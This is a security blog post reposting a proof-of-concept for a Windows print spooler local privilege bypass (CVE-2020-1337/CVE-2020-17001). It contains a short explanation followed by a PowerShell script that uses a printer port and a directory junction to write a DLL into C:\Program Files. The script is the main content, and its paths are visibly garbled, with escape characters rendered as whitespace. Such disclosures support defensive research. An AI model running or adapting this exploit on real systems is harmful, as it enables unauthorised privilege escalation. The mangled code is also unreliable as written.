Categories: Vulnerabilities

Microsoft Windows Local Spooler Bypass Vulnerability

Published by
RiSec.Mitch

One way of exploiting this on Windows 10 200x is to understand that FileNormalizedNameInformation will fail if the new path after the mount point is not under the root directory of the server. For example the admin$ share points to c:\\windows. If you set the mount point to write to c:\\Program Files then the normalization process will fail and the original string returned. This allows you to write to anywhere outside the windows directory by placing a mount point somewhere like system32\ asks.

For example the following script will write the DLL to the root of Program Files.

Windows: Local Spooler CVE-2020-1337 Bypass
 

mkdir \"C:\windows\system32\  asks\  est\"
Add-PrinterDriver -Name \"Generic / Text Only\" 
Add-PrinterPort -Name \"\\localhost\admin$\system32\  asks\  est\  est.dll\" 
Add-Printer -Name \"PrinterExploit\" -DriverName \"Generic / Text Only\" -PortName \"\\localhost\admin$\system32\  asks\  est\  est.dll\"
rmdir \"C:\windows\system32\  asks\  est\"
New-Item -ItemType Junction -Path \"C:\windows\system32\  asks\  est\" -Value \"C:\Program Files\"
\"TESTTEST\" | Out-Printer -Name \"PrinterExploit\"
 
 
Related CVE Numbers: CVE-2020-1337,CVE-2020-17001,CVE-2020-1337.
 
 
 
Found by: forshaw at google.com
Bookmark
Please login to bookmark Close
Social Comments Box
Share the word, let's increase Cybersecurity Awareness as we know it

This post was last modified on 13 November 2020 8:19 PM

RiSec.Mitch

Just your average information security researcher from Delaware US.

Leave a Comment
Published by
RiSec.Mitch
Tags: bypass code CVE-2020-1337 CVE-2020-17001 example exploit microsoft mkdir spooler SYS system32 vulnerabilities Vulnerability win10 windows windows 10 write

Recent Posts

  • Data Breach News
  • InfoSec News

WH Smith Announces Cyber-Attack: Employee Data Stolen

British high street chain WH Smith has recently revealed that it was hit by a…

2 years ago
  • InfoSec News
  • World Affairs

Voice ID: How Secure is it Really?

As banks worldwide roll out Voice ID as a means of user authentication over the…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

What distinguishes Application Security from API Security?

In the era of digital transformation, cybersecurity has become a major concern for businesses. When…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

The Top 5 Cybersecurity threats facing Businesses Today

In today's digital age, cybersecurity threats have become a significant concern for businesses of all…

2 years ago
  • InfoSec News
  • World Affairs

Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer

The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…

2 years ago
  • Cybersecurity Academy

The Rise and Rise of AI

One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…

2 years ago